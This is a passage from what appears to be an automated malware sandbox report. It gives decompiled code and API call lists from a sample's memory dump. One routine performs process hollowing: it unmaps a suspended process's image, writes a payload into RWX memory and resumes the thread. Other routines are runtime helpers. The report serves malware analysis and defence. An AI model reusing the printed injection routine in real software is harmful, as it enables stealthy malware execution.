										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
										} else {
											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
										}
									}
									_t210 = _v28;
									if(_v28 != 0) {
										_t197 = E00417EA4(_t196, _t210);
										_t125 = _v28;
										if( *(_t194 + 0x34) != _v28) {
											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
											 *(_t194 + 0x34) = _v28;
											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
										}
										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
										SetThreadContext(_v48.hThread, _v16);
										ResumeThread(_v48.hThread);
										WaitForSingleObject(_v48.hThread, 0xffffffff);
										_push(_t199);
										_push(0x4181d0);
										_push( *[fs:eax]);
										 *[fs:eax] = _t201;
										TerminateThread(_v48.hProcess, 0);
										CloseHandle(_v48.hProcess);
										_pop(_t189);
										 *[fs:eax] = _t189;
									}
								}
								VirtualFree(_v20, 0, 0x8000);
							}
							if( *_a4 == 0) {
								TerminateProcess(_v48, 0);
							}
						}
					}
				}
				_pop(_t182);
				 *[fs:eax] = _t182;
				_push(E0041821F);
				return E00403EAC( &_v12, 2);
			}























    0x00417f5c
    0x00417f5d
    0x00417f5f
    0x00417f65
    0x00417f67
    0x00417f6a
    0x00417f70
    0x00417f78
    0x00417f7f
    0x00417f80
    0x00417f85
    0x00417f88
    0x00417f8f
    0x00417f91
    0x00417f96
    0x00417f99
    0x00417f9e
    0x00417fa9
    0x00417fa9
    0x00417fb3
    0x00417fb5
    0x00417fbc
    0x00417fc5
    0x00417fcd
    0x00417fdd
    0x00417fec
    0x00417ff1
    0x00417ff8
    0x00417fff
    0x0041801c
    0x00418032
    0x0041803e
    0x00418048
    0x0041804f
    0x00418058
    0x0041806d
    0x0041808e
    0x00418099
    0x004180fc
    0x0041809b
    0x004180aa
    0x004180df
    0x004180ac
    0x004180c4
    0x004180c4
    0x004180aa
    0x004180ff
    0x00418103
    0x00418110
    0x00418115
    0x0041811a
    0x00418122
    0x0041812a
    0x00418139
    0x00418139
    0x0041814f
    0x0041816f
    0x0041817d
    0x0041818b
    0x00418194
    0x0041819f
    0x004181a6
    0x004181a7
    0x004181ac
    0x004181af
    0x004181b8
    0x004181c1
    0x004181c8
    0x004181cb
    0x004181cb
    0x00418103
    0x004181e5
    0x004181e5
    0x004181f0
    0x004181f8
    0x004181f8
    0x004181f0
    0x00418032
    0x00417fcd
    0x004181ff
    0x00418202
    0x00418205
    0x00418217

    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00404E08, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00404DF4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00404DF4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401248();
									while( *_t93 != 0) {
										_t90 = E00404DF4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401248();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401250();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401248();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401250();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401248();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401248();
						}
					}
				}
				L17:
				return _v16;
			}



















    0x00404e14
    0x00404e17
    0x00404e1d
    0x00404e2a
    0x00404e2e
    0x00404e70
    0x00404e76
    0x00404eb3
    0x00000000
    0x00404e78
    0x00404e7f
    0x00404e90
    0x00404e95
    0x00404e9b
    0x00404ea3
    0x00404ea8
    0x00404eb6
    0x00404eb8
    0x00404ebe
    0x00404ec2
    0x00404ec9
    0x00404eca
    0x00404f75
    0x00404edc
    0x00404ee0
    0x00404eed
    0x00404ef4
    0x00404ef5
    0x00404efe
    0x00404eff
    0x00404f17
    0x00404f1c
    0x00404f1f
    0x00404f24
    0x00404f2a
    0x00404f2b
    0x00404f3b
    0x00404f3d
    0x00404f4d
    0x00404f54
    0x00404f5e
    0x00404f5f
    0x00404f64
    0x00404f6a
    0x00404f6b
    0x00404f71
    0x00404f73
    0x00000000
    0x00404f73
    0x00404f3b
    0x00404f1c
    0x00000000
    0x00404eed
    0x00404f81
    0x00404f88
    0x00404f8c
    0x00404f8d
    0x00404f8d
    0x00404ea8
    0x00404e95
    0x00404e7f
    0x00404e30
    0x00404e3b
    0x00404e3f
    0x00000000
    0x00404e41
    0x00404e41
    0x00404e4c
    0x00404e50
    0x00404e55
    0x00000000
    0x00404e57
    0x00404e5a
    0x00404e61
    0x00404e65
    0x00404e66
    0x00404e66
    0x00404e55
    0x00404e3f
    0x00404f92
    0x00404f9b

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
